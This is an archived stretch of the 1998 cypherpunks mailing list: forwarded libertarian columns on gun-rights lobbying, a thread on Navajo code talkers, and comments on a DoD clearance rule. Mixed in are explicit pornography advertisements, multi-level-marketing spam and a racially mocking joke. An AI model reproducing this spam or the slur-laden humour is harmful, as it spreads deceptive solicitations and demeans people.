Smith's "Bretta Martin," which is good, but not "Pallas," which would be
better. Also missing are John Ross' "Unintended Consequences" (Accuracy
Press) and Claire Wolfe's "101 Things to Do Till the Revolution"
(Loompanics.)

  It's also worth getting on the mailing list of the Cato Institute, at 100
Mass. Ave. NW, in Washington D.C., 20001 (tel. 202-842-0200), and of Bumper
Hornberger's Future of Freedom Foundation (e-mail FFFVA@compuserve.com), in
Northern Virginia.

  The Ludwig von mises Institute (owner-misesmail@colossus.net), tel.
334-844-2500 puts out some nifty economic publications, and for e-mail on
jury rights issues you can't beat the Jury Rights Project, e-mail
jrights@levellers.org; web page www.lrt.org/jrp.homepage.htm.

  Leading the new battle against the national ID card is the Coalition to
Repeal the Fingerprints Law, Suite 133, 5446 Peachtree Industrial Blvd.,
Atlanta 30341; voice mail 404-250-8105; web site
www.atlantainfoguide.com/repeal/.

  I seem to have fallen out of touch with the Separation of School and
State Alliance, based in California; maybe they'll send me some up-to-date
contact information.

  President Brenda Grantland tells me the group Forfeiture Endangers
American Rights has recently opened an office in D.C., and may be in a
position to welcome volunteer help as well as contributions. Contact
Interim Director Tom Gordon at the F.E.A.R. Foundation,  P.O. Box 15421
Washington, D.C. 20003; tel. 202-546-4381, or toll free at 1-888-FEAR-001;
e-mail TomGordon@fear.org; web site http://www.fear.org.

  Other groups worth contacting for information -- and supporting with
donations or volunteer help -- include the Fully-Informed Jury Association
at Box 59, Helmville, Montana 59843, tel. 406-793-5550, and Aaron Zelman's
Jews for the Preservation of Firearms Ownership, 2874 S. Wentworth Ave.,
Milwaukee, Wisc. 53207, tel. 414-769-0760 (web site http://www.JPFO.org;
e-mail Against-Genocide@JPFO.org.)

  JPFO welcomes "righteous goyim," or non-Jews, and in fact never even asks
prospective members their religion.

  I used to think JPFO was the only truly principled gun-rights
organization in the nation, holding that ANY "gun control" is an inevitable
precursor to new genocides. I am now, finally, ready to submit that there
are two.

  I have been watching for some years the development of Larry Pratt's Gun
Owners of America, based at 8001 Forbes Place, Suite 102, Springfield, Va.
22151; tel. 703-321-8585; web site http://www.gunowners.org; e-mail
goaslad@aol.com.

  Folks have always called GOA "the other gun group," in deference to the
massive and cholesterol-clogged National Rifle Association.

  Enemies of freedom always enjoy caricaturing ther NRA as a bunch of
buck-toothed hunters in plaid shirts, blasting away at Bambi with a
bazooka.

  But let me make a fearless prediction right here: as the lean little GOA
strides onto their battlefield like an adolescent saber-tooth, the forces
of victim disarmament are going to start waxing reminiscent about the warm,
happy days when their only "opposition" was that walnut-brained
brontosaurus, the NRA.

  The NRA's lobbying philosophy has long been to ridicule Libertarians or
Independents who may be TRUE devotees of our Second Amendment rights,
instead cynically endorsing and even funding the "lesser of two evils"
among the two candidates representing the Republicrat and Demopublican
branches of the Big Government Party.

  This NRA spending and lobbying philosophy is all about "buying access,"
but as Mr. Pratt of GOA says, "It's all based on a defeatist attitude. They
think we've lost, that we have a bad bargaining position, so all we can do
is make the best deal we can with this tyrant."

  Recently, NRA lobbyists have even twisted arms in state legislatures
around the nation to INCREASE the cost and "training" rigmarole required to
lay hands of a state "concealed carry permit" ... the better to insure the
standards are the same nationwide.

  GOA thinks permit requirements should be identical in every state, too
... identical to the current law in Vermont, which requires no permit for
concealed carry, at all, and which has "the lowest murder rate in the
country," smiles Mr. Pratt.

   "But the 'access' lobbyists, if their approach was right, why do we keep
losing ground?" Pratt asked his enthusiastic Las Vegas crowd.

  Next time: The GOA plays hardball.

Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com. The web
site for the Suprynowicz column is at http://www.nguworld.com/vindex/. The
column is syndicated in the United States and Canada via Mountain Media
Syndications, P.O. Box 4422, Las Vegas Nev. 89127.

***


Vin Suprynowicz,   vin@lvrj.com

"If ye love wealth greater than liberty, the tranquility of servitude
greater than the animating contest for freedom, go home from us in peace.
We seek not your counsel, nor your arms. Crouch down and lick the hand that
feeds you. May your chains set lightly upon you; and may posterity forget
that ye were our countrymen."    -- Samuel Adams

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 1 Feb 1998 06:21:24 +0800
To: cypherpunks@cyberpass.net
Subject: Feb. 8 coilumn -- GOA
Message-ID: <v04003a0cb0f93959c150@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Sat, 31 Jan 1998 02:11:43 -0700
X-Sender: vin@dali.lvrj.com
Mime-Version: 1.0
Date: Sat, 31 Jan 1998 01:12:36 -0800
To: cathy@engr.colostate.edu
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Feb. 8 coilumn -- GOA
Resent-From: vinsends@ezlink.com
X-Mailing-List: <vinsends@ezlink.com> archive/latest/431
X-Loop: vinsends@ezlink.com
Precedence: list
Resent-Sender: vinsends-request@ezlink.com


    FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED FEB. 8, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    Second Amendment: changing of the guard

    Last time, we were discussing the "take-the-best-available-compromise,"
defeatist attitude of the nation's largest gun control organization, the
National Rifle Association.

  Their lighter, leaner competition for gun owner support, Gun Owners of
America, prefers a more high-pressure approach, putting the fire to the
feet of lawmakers to make sure they know that a vote against gun rights
will cost them their next election ... just as Bill Clinton acknowledged
that the gun rights vote cost the Democratic Party its control of Congress
in 1994.

  In a 1968 edition of the NRA's magazine, "The American Rifleman,"
Associate Editor Alan C. Webber responded to then-timely criticism by U.S.
Sen. Robert Kennedy, D-N.Y., who said "I think it is a terrible indictment
of the National Rifle Association that they haven't supported any
legislation to ban and control the misuse of rifles and pistols in this
country."

  To this, Mr. Webber reports NRA Executive Vice President Franklin L. Orth
responded with a ringing endorsement of the 1968 Gun Control Act. "The
National Rifle Association has been in support of workable, enforceable gun
control legislation since its very inception in 1871," Mr. Orth proclaimed.
"The duty of Congress is clear. It should act now to pass legislation that
will keep undesirables, including criminals, drug addicts and persons
adjudged mentally irresponsible or alcoholic, or juveniles, from obtaining
firearms through the mails."

  One will remember that the way the 1968 law accomplished that, was by banning
EVERYONE but an ever-shrinking pool of federally licensed gun dealers from
"obtaining firearms through the mails"! Sort of like "getting drunks off the
road," by banning cars and trucks!

  "The NRA position, as stated by Orth, emphasizes that the NRA has
consistently supported gun legislation which it feels would penalize misuse
of guns, without harassing law-abiding hunters, target shooters and
collectors," concludes editor Webber.

  What an interesting list. Do you see "militiamen" in there? I don't. Does
the Second Amendment say anything about duck-hunting?

  The Brits, who have just finished banning all private ownership of
handguns, insist THEY still protect the "rights of law-abiding hunters,
target shooters, and collectors," too.

  If you have an English country estate, you can still own a
richly-engraved, $5,000 bird gun. If you like to target shoot, you may fire
pellet guns or even .22s at your registered club ... so long as you leave
the weapon locked up there when you go home. And "collectors" are still
presumably welcome to own as many guns as they want ... from the flintlock
era or earlier.

  Gee, that'll put them in great shape the next time the Germans or French
come storming the beaches. Which is precisely why OUR Second Amendment
talks exclusively about the needs of "the militia."

  Meantime, Alcohol Tobacco and Firearms agents holding a panel discussion
for an audience of mostly gun store owners at this week's SHOT Outdoor
Trades show, here in Las Vegas, declared that the way they interpret the
"permanent replacement Brady Bill" due to go into effect in November of
1998 -- the one the NRA favors due to its promised "insta-Check" capability
-- will call for a "Brady check" and permanent record of every LONG GUN
purchase, as well.

  The NRA operates, in effect, as nothing but a public relations outreach
arm for the Republican Party, tasked to convince gun rights advocates that
the GOP is their only hope.

  But Newt Gingrich promised us that if only we would elect a GOP majority
to Congress there would be "no more gun control passed" on his watch,
didn't he?

  Mind you, that's a pretty modest promise, compared to the Libertarian Party
platform plank on guns, which calls for ALL existing gun control laws to be
immediately REPEALED.

   But not only have Mr. Gingrich's Republicans failed to repeal the major
federal gun control acts of 1933 and 1968, not only have they failed to
repeal the Brady Bill and the Feinstein-Schumer "assault weapons ban" (as
they promised), but they actually ENACTED the so-called Anti-Terrorism Bill
with the Lautenberg Amendment, which retroactively strips police and many
other citizens of their gun rights based on any prior domestic misdemeanor
convictions (shouting at your kids).

   And then, not satisfied, they went on to pass the "Gun Free School Zone
Act" ... TWICE!

  Putting him to the test of fire, I asked Larry Pratt of GOA last week
whether he would favor allowing a 17-year-old girl to walk into a hardware
store, buy and take home a belt-fed .30-caliber machine gun, without
signing her name, showing any ID, or applying for any kind of government
"permit."

   "Well, that's the way it would have been in 1933, before the National
Firearms Act, wouldn't it?" he asked.

  "Is that a yes?" I asked back.

   Mr. Pratt, in front of a sizeable public gathering at the San Remo Hotel
and Casino, said "Yes."

  And that's why I think we're about to see a changing of the guard when it
comes to gun-rights lobbying, from the arthritic and the defeated, to the
aggressive, the fearless, and the principled.

  Congressman Ron Paul, R-Tex., has called Gun Owners of America "the only
no-compromise gun lobby in Washington." With a fraction of the NRA's
manpower, membership or budget, GOA has defeated powerful state legislative
committee chairmen (in Ohio) who were foolish enough to support more gun
control, and has helped elect congressmen like Roscoe Bartlett of Maryland,
currently sponsor of HR27, the Citizens Self-Defense Act, which would
"protect the right to obtain ... and to use firearms in defense of self,
family or home."

  Unless they change their stripes with fearsome speed, I fear the NRA and
their hog-trough affiliate, the Republican Party as we've known it, are
headed for the elephant's graveyard, and soon.

  On the other hand, if Gun Owners of America sold stock, I'd be buying.

Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com.

***



Vin Suprynowicz,   vin@lvrj.com

"If ye love wealth greater than liberty, the tranquility of servitude
greater than the animating contest for freedom, go home from us in peace.
We seek not your counsel, nor your arms. Crouch down and lick the hand that
feeds you. May your chains set lightly upon you; and may posterity forget
that ye were our countrymen."    -- Samuel Adams

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sun, 1 Feb 1998 16:45:44 +0800
To: cypherpunks@cyberpass.net
Subject: Re: RIP, Carl Gorman, Code Talker
In-Reply-To: <Pine.LNX.3.95.980130231307.24853A-100000@gilligan.netisle.net>
Message-ID: <v03102805b0f96fdf241f@[17.219.146.66]>
MIME-Version: 1.0
Content-Type: text/plain



>
>- aside from the NSA sucking up everything in sight relating to
>languages, doesn't Chomsky's theoretical 'Universal Syntax' (all
>human languages have an identical fundamental syntax) negate the
>effectiveness of the Code-Talker approach in the long run?
>

Not really; at its core, Chomsky's theory is a claim that every
human can learn any human language -- something that 2-year old
infants prove every day. I.e., nothing in language is specific
to any particular human social or racial group: the differences
are learned.  There is a fair body of research that indicates
that, after (roughly) puberty, humans do not learn foreign
languages in the same way that infants learn their first language;
but rather overlay the new language on top of their existing
language.

>- on the other hand, the lovely ambiguities of natural language
>would seem to be capable of effectively obscuring the meaning of
>the message even if the plaintext were revealed.

The code talkers used a variety of puns and allegorical metaphors
to hide the underlying meaning from someone who could translate
Navaho but lacked the overall shared culture of the Navaho sailors.
During the 1940's, only a handful of non-Navaho (generally linguists)
were fluent in the language (probably less than two dozen).

Incidently, in a recent episode of the South Bronx tv series, a crime
was solved because a black policeman was fluent in Japanese.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xxx4free@xxxpics.org
Date: Sun, 1 Feb 1998 09:19:03 +0800
To: <cypherpunks@toad.com>
Subject: ONLY READ IF INTERESTED IN FREE PORN, OTHERWISE DELETE
Message-ID: <84675145_40932584>
MIME-Version: 1.0
Content-Type: text/plain




Hi there! want free porn? how about my nude pic? want pics that are updated every day? Or how about membership to XXX Adult sites, where the bill is payed by us?!? How about FREE live sex? If you do then visit http://www.xxxpics.org for the BEST xxx pics, updated daily, LIVE SEX, AVIs, MPEGS, and more!!!!!  

So hurry! and visit

http://www.xxxpics.org

Thank you for your time.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Sun, 1 Feb 1998 04:08:35 +0800
To: John Young <attila@primenet.com>
Subject: Re: Why This List Is A Security Risk
In-Reply-To: <1.5.4.32.19980131020517.00720848@pop.pipeline.com>
Message-ID: <19980131.194552.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>(4) Any foreign, domestic, or international organization or person
>engaged in analysis, discussion, or publication of material on
>intelligence, defense, foreign affairs, or protected technology.

    that must be why the federal assholes have always denied aps
    for clearance, we are bunch of fucking subversives! <g>
    
    of course, I know better than that:  more than once having
    told representatives of the criminal class that I may sell
    my services on the market, but I am not your, not my,
    government's whore.  
    
    unfortunately, (yeah, right!)  they have taken a dim view of
    me --and most anyone I associate with.  well, fuck 'em if
    they cant take a joke --criticism is part of freedom and 
    when the govcritters figure out they represent us, not 
    own us; and when they stop hypocritically dictating policy 
    to the rest of the world, maybe we'll have something to talk
    about.
    
    and, if that last statement comes true, I'll not only 
    believe in the tooth fairy, but I'll throw in the fairy 
    godmother for a bonus. shit, I'll even toss in a godfather 
    or two...
    
        attila out...  grousing

    === whole text from jya ===

on or about 980130:2105, in <1.5.4.32.19980131020517.00720848@pop.pipeline.com>, 
    John Young <jya@pipeline.com> was purported to have 
    expostulated to perpetuate an opinion:

>Setting policy on national security risk for the entire USG,  the DoD
>proclaims a trustworthy person does not engage in  the following:

>Sec. 147.14  Guideline L--Outside activities.

>    (a) The concern. Involvement in certain types of outside employment
>or activities is of security concern if it poses a conflict with an
>individual's security responsibilities and could create an increased risk
>of unauthorized disclosure of classified information.
>    (b) Conditions that could raise a security concern and may be
>disqualifying include any service, whether compensated, volunteer, or
>employment with: 
>    (1) A foreign country;
>    (2) Any foreign national;
>    (3) A representative of any foreign interest;
>    (4) Any foreign, domestic, or international organization or person
>engaged in analysis, discussion, or publication of material on
>intelligence, defense, foreign affairs, or protected technology.

>-----

>>From 32 CFR Part 147 published today.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNOCwrR8UA6T6u61AQFmvwH/QPMS8SgEbHuwAMDYcTdQe2hkYALuqnyk
3uPGfN1psh7k+saOLFchVVGSpmTriYVPpnM5kKK/RSx/UqCMqLxqmw==
=GBIt
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Harland <foggy@gilligan.netisle.net>
Date: Sun, 1 Feb 1998 13:31:47 +0800
To: cypherpunks@ssz.com
Subject: Re: RIP, Carl Gorman, Code Talker
Message-ID: <Pine.LNX.3.95.980131212227.20322A-100000@gilligan.netisle.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May responded on Sat. January 31, 1998....

 >>- aside from the NSA sucking up everything in sight relating to
 >>languages, doesn't Chomsky's theoretical 'Universal Syntax' (all
 >>human languages have an identical fundamental syntax) negate the
 >>effectiveness of the Code-Talker approach in the long run?
 >>  
 >  "All crypto is economics." One doesn't have to jump to theoretical
 >  mumbo
 >  jumbo about a putative "identical fundamental syntax" to know that the
 >   Navajo code talkers were not using an unbreakable system.
	If there is a universal syntax, you could very quickly
	whip up a framework for the language involved and at least
	be able to identify nouns, verbs, etc. Then with each commun-
	ication expand and specify. I don't know if that's possible
	and therefore don't know if it's 'theoretical mumbo-jumbo'.
	It doesn't sound too far-fetched but then I'm an optomistic
	kinda guy eh.
>   But what mattered is that, for the level of security needed on the
>   battlefield, the system was "essentially secure" against Japanese
>   translation. Sure, in time the Japanese could have found some experts
>   on
>   Navajo, could have trained their own code talker translators, etc. But
>   they
>   didn't have this time. (And if we posit "enough time," then the U.S.
>   military would have had enough time to drop the Navajo code talkers
>   and
>   replace them with Ebonics code talkers. Dat be da jive, mo fo.)
	We had plenty of time in Somalia to capture 'Warlord' Aidide.
	Not only did we fail to capture him, he rubbed it in with a
	daily radio program. We couldn't find the ever-moving trans-
	mitter let alone close it down. I well remember our top Butt
	Sniffer in Somalia royally pissed off on TV vowing that we'd
	throw everything we had into the hunt and bring him to justice.
	Aidide was still standing there, flipping us The Bird as we 
	left. 
	My impression was that the Somalies 'under-teched' us. Being
	dirt-poor must have made that an easy decision. But they 
	executed it very well. The most powerful, technologically soph-
	isticated military machine in human history found itself
	groping stupidly in the dark when up against a non-tech
	foe. We're obviously utterlly and completely dependent on 
	our toys. Take our batteries away and we're S.O.L.

>   "All crypto is economics."
> 	  
>   --Tim May
	Hmmm...There it is again. It's interesting but a bit ambiguous.	  

-----------------------------------------------------------------
foggy@netisle.net                  lat:47d36'32" long:122d20'12"
"Rather perish than hate and fear, and twice rather perish than
make oneself hated and feared."                    -F. Nietzche-
-----------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 1 Feb 1998 13:52:47 +0800
To: cypherpunks@Algebra.COM
Subject: Re: RIP, Carl Gorman, Code Talker
In-Reply-To: <Pine.LNX.3.95.980131212227.20322A-100000@gilligan.netisle.net>
Message-ID: <v03102803b0f9bba3e446@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:26 PM -0800 1/31/98, Gary Harland wrote:

>	If there is a universal syntax, you could very quickly
>	whip up a framework for the language involved and at least
>	be able to identify nouns, verbs, etc. Then with each commun-
>	ication expand and specify. I don't know if that's possible
>	and therefore don't know if it's 'theoretical mumbo-jumbo'.

If you say so...

>	We had plenty of time in Somalia to capture 'Warlord' Aidide.
>	Not only did we fail to capture him, he rubbed it in with a
>	daily radio program. We couldn't find the ever-moving trans-
>	mitter let alone close it down. I well remember our top Butt
>	Sniffer in Somalia royally pissed off on TV vowing that we'd

????


>>   "All crypto is economics."
>>
>>   --Tim May
>	Hmmm...There it is again. It's interesting but a bit ambiguous.

I apologize to the Cypherpunks for responding seriously to Gary Harland. I
should've waited to see a few more of his posts, to figure out whether he's
a nitwit or is just trolling.

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Sun, 1 Feb 1998 14:14:13 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: RIP, Carl Gorman, Code Talker
In-Reply-To: <Pine.LNX.3.95.980130231307.24853A-100000@gilligan.netisle.net>
Message-ID: <v03110772b0f9bfb4c90f@[207.94.249.133]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:29 AM -0800 1/31/98, Tim May wrote:
>But what mattered is that, for the level of security needed on the
>battlefield, the system was "essentially secure" against Japanese
>translation. Sure, in time the Japanese could have found some experts on
>Navajo, could have trained their own code talker translators, etc. But they
>didn't have this time. (And if we posit "enough time," then the U.S.
>military would have had enough time to drop the Navajo code talkers and
>replace them with Ebonics code talkers. Dat be da jive, mo fo.)

When I was in China, I noted that French accented English was "essentially
secure" against understanding by our Chinese hosts.  We Americans did a lot
of English to English translation on that trip.


-------------------------------------------------------------------------
Bill Frantz       | Market research shows the  | Periwinkle -- Consulting
(408)356-8506     | average customer has one   | 16345 Englewood Ave.
frantz@netcom.com | teat and one ball.         | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoket@usa.net
Date: Wed, 31 Dec 1997 04:17:42 -0800 (PST)
To: hoket@usa.net
Subject: FREE $600 Worth of Software !!!
Message-ID: <199712273755.LAC88852@taretmail.net>
MIME-Version: 1.0
Content-Type: text/plain


				

 "FREE" $600 Worth of SOFTWARE "EXPLODES YOUR BUSINESS" 

 Hello,
  
You don't want to trash this one! I "WILL" give you absolutely "Free" 
Software that sells for $600. I WILL NOT ASK FOR ANY MONEY at Any Time.
  
The $200 "CHECKER" software program allows you to accept checks by fax, email, or telephone. If you have ever wanted or presently have an internet business.......this is a MUST!
  
BONUS!! Now I also provide you with a "well known" software program that will easily enable you to obtain contact information on potential customers right from the internet. Similar software sells for $400+. You will be able to obtain these sales leads by the thousands while you are "online".

Will your business "EXPLODE"?
  
You bet it will!               IT HAS TO !!!!
  
You will become a part of a  DOWNLINE THAT HAS THIS CAPABLITY!
  
Along with these software programs, I provide you with a "GREAT", "FREE
BUSINESS", that you can promote on the internet and off. 

Additional BONUS - you will receive one of the cheapest long distance rates available today!! NO Sign-up Fees! NO Hidden Costs!
  
For quick and  FREE  details, just send an email with CHECKER in the subject 
line to:
 		 <mailto:morkim@hotmail.com>         

and you will receive information about this exciting opportunity right away!
  
I look forward to your response.  You may email me at:  

				morkim@hotmail.com 

for an immediate  response for more info.


Thanks,          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Thu, 1 Jan 1998 00:12:12 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Thu Jan 1 '98
Message-ID: <19980101080546.11277.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Thursday's issue of Eureka!

PINKBITS
Voted the  #1 Teen (18+) site  on the web,  this is  one pay
site you  don't want  to miss out on!  Here's just one quote
from a satisfied member:  "This site delivers awesome value.
I have been a member of 3 other sites,  and this is the best
by far. It has the best pics, more live video, younger girls
and more  hardcore cumshots  than the  other sites  put tog-
ether".  And we have negotiated a special FREE trial member-
ship for Eureka subscribers, so don't take our word, go see!
PinkBits .. http://207.33.10.198/cgi-bin/gate1/pbm/pb_0024/0

GAYEUREKA!
NEW!! The new gay newsletter  is now available.  All the gay
material from this newsletter and a whole load more will now
appear in the new newsletter. If you would like to subscribe
Please click here ..... http://eureka.abc-web.com/gayeureka/

EUREKA! is now  available in three additional languages.  So
now you can choose from any of the following. And don't for-
get, from January 10th we'll add Portuguese and Italian too!
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm

HAPPY NEW YEAR!
Did you party too much?  Ease your  headache with some great
websites and free pix!  We have movies today and a gay site.

SITE SEX
This site has a lot to offer. Free movies and a cool gallery
featuring a slide show  feature.  You set it up for what you
like and let it roll. Some programmers have been working ov-
ertime here!  It may not  load super fast but  check it out.
Site Sex ........................... http://www.sitesex.com/

SEX UTOPIA
Scroll down the page after hitting "enter" to find some free
pix.  They have 40 of them! "Welcum to SEX UTOPIA one of the
best free sites on the web ...some of the hottest pictures!"
Sex Utopia .......................... http://207.55.184.113/

BOYPAGES
There are several galleries at this website with lots of pix
that feature a lot of  good looking studs.  Talk about wash-
board  stomachs!  Maybe it's  time to hit the gym?  Surf it!
Boypages .......................... http://www.boypages.com/

A PWERNO OVERDOSE
"PWerno -that fine mix of Porn and the Web is brought to you
by the letters P, W, and the sexy sites."  Huh?  Whatever it
means there are some great  pussy pix here.  Click the "this
link" to get  rolling to the good stuff.  See the Coke girl,
mmmm kinda make ya  thirsty!  Worth the modem haul, surf it!
A Pwerno Overdose ............. http://www.pwerno.inter.net/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
The hardcore channels .. http://www.EroticPleasures.net/xxx/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
FONTAINE:  A buxom blonde with a very tone body,  she is the
girl that  everyone dreams about.  She says she  is just the
average girl next door,  but,  if that is true she must live
in one hell of a neighborhood, nothing is average about this
busty  amateur.  See her and  her hooters  and you  will not
regret it! ................. http://amateurindex.com/eureka/

TODAY'S FREE PIX
OK,  it's the new year, and now we are really going to start
getting in gear,  with some of the hottest FREE photos ever!
Pic  1 ........................... http://137.39.63.229/?010
Pic  2 ........................... http://137.39.63.229/?011
Pic  3 ........................... http://137.39.63.229/?012
Pic  4 ........................... http://137.39.63.229/?013
Pic  5 ........................... http://137.39.63.229/?014
Pic  6 ........................... http://137.39.63.229/?015
Pic  7 ........................... http://137.39.63.229/?016
Pic  8 ........................... http://137.39.63.229/?017
Pic  9 ........................... http://137.39.63.229/?018
Pic 10 ........................... http://137.39.63.229/?019

PLEASE VISIT THIS FINE EUREKA! MEMBER SITE
Naked Supermodels and Celebrities
http://www.celebgifs.com
Naked Supermodels like Cindy Crawford and Naomi Campbell ,
nude celebs like Demi Moore, Brad Pitt, Meg Ryan, more.

------------------------------------------------------------
If you would like to unsubscribe from the Eureka! Newsletter
simply select reply and send us a quick reply to this email.
------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ForInformationCall@1-800-339-2933-EXT.4775
Date: Thu, 1 Jan 1998 16:52:43 -0800 (PST)
To: WiseFolks@UwiseFolk.com
Subject: 1998 Resolutions
Message-ID: <67656288_47101688>
MIME-Version: 1.0
Content-Type: text/plain



*********************************************************************
  - Remove from list information is after this important message -
*********************************************************************
                              *******

Is one of your 1998 New Years Resolutions to create additional revenue
streams to supplement your income?  If so please take a close look at
our company.

We don't offer a pie in the sky, get rich quick, scheme.  What we do
offer is a sound opportunity with a four year old company, working 
with talented, experienced business and media professionals who will
work with you to create a significant income stream in 1998 and for
many years to come.

Success Magazine in their September issue highlighted our company as
"THE ONE TO WATCH".  We have been featured in Working At Home and
named the HOT PICK COMPANY in MarketWave, as well as being recognized
by many other leading publications this past year.

We are about to launch a MAJOR MARKETING BLITZ during the first quarter
of 1998 which includes TV, radio and print. BRUCE JENNER, America's
Olympic Champion and Infomercial Superstar is our television spokesman.

WE ARE LOOKING FOR PEOPLE TO HELP WORK WITH AND PROFIT FROM THE INFLUX
OF NEW DISTRIBUTORS THAT OUR MARKETING CAMPAIGN IS ATTRACTING!

IF YOU ARE LOOKING TO SUPPLEMENT YOUR INCOME PART-TIME OR ARE LOOKING 
AT A FULL-TIME CAREER OPPORTUNITY CALL 1-800-339-2933, EXT. 4775 FOR A
FREE INFORMATION PACKAGE AND TO FIND OUT HOW YOU CAN PROFIT!

If you want 1998 to be better than 1997, please call our 800 number.
You owe it to yourself and your family!

HAPPY NEW YEAR AND GOD BLESS!

******************************************************************
******************************************************************
TO BE REMOVED FROM OUR MAILING LIST, TYPE: REMOVE97@ix.netcom.com
in the (TO:) area and (REMOVE) in the subject area of a new E-mail 
and send.
******************************************************************
******************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PleaseCall@1-800-260-7099-Ext.212030
Date: Thu, 1 Jan 1998 21:57:42 -0800 (PST)
To: WiseFolks@UwiseFolk.com
Subject: Earn FREE Gasoline and Long Distance !
Message-ID: <6205121_97743995>
MIME-Version: 1.0
Content-Type: text/plain



*********************************************************************
  - Remove from list information is after this important message -
*********************************************************************
                              *******

If you could ELIMINATE or reduce your GASOLINE and LONG DISTANCE
expenses, and earn a lucrative income, would you be interested?

Vision Unlimited offers you a unique home-based business opportunity.
This is not your typical MLM.  Vision Unlimited doesn't sell pills
and lotions or soaps and potions.  We place you in two of the largest
industries in the world.

This is a new company, and we are looking for self-motivated people 
that want to be  part  of a company that goes from small to BIG!

Vision Unlimited is the only outlet for 20% discounted Gasoline!

Vision Unlimited will put you in business for yourself, but not by 
yourself.  Let us help you start a national business right from 
your home.  DO NOT put this off.  Vision Unlimited can help you meet
your financial goals for 1998!!!

You may call me anytime to get your questions answered.
Voice mail - 1-800-260-7099 ext. - 212030
Office - 717-764-1922
Thank you,  Marty

******************************************************************
******************************************************************
TO BE REMOVED FROM OUR MAILING LIST, TYPE: REMOVE97@ix.netcom.com
in the (TO:) area and (REMOVE) in the subject area of a new E-mail 
and send.
******************************************************************
******************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: menema37@path.or.jp
Date: Fri, 2 Jan 1998 05:58:03 -0800 (PST)
To: menema37@path.or.jp
Subject: XXX ADULT SEX!!!
Message-ID: <199801024291RAA30040@post.164.160.2>
MIME-Version: 1.0
Content-Type: text/plain


The LARGEST selection of Hot Beautiful XXX Live Girls
from the  U.S.A. & Europe!!! 

Voted as the 1998 best Adult Site!  

*LIVE GIRL SEX SHOWS!!!
* 4 FREE Live Video Feeds & Chatrooms!!! 
*FREE Erotic Stories!!
*Free Pictures of XXX Porn Stars!!
*Confessions!!!
*Free Pictures of Teens & Men!!!
And Lots More to do for FREE!!!


